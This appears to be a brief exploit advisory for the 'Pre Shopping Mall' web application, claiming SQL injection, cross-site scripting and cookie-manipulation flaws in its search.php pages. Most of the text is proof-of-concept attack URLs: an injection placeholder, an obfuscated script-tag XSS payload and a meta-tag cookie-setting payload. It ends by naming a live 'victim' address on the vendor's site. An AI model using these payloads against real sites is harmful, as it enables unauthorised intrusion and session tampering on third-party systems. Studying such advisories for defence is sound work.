Pre Shopping Mall suffers from cookie manipulation, cross site scripting, and remote SQL injection vulnerabilities.
373f296979926bcec2c61a89b9fa5d6a89a5d9ee5df02c47361b2ae7bed8a7d7
#########################################################
---------------------------------------------------------
Portal Name: PRE SHOPPING MALL
Vendor : http://www.preproject.com/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,CM,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/search.php?search=[SQL]&submit=Search
[XSS]:
http://site.com/[Path]/search.php?search=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=Search
[CM]:
http://site.com/[Path]/emall/search.php?search=111-222-1933Pouya@yahoo.com&skip=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'
>
---------------------------------
Victem :
http://preproject.com/emall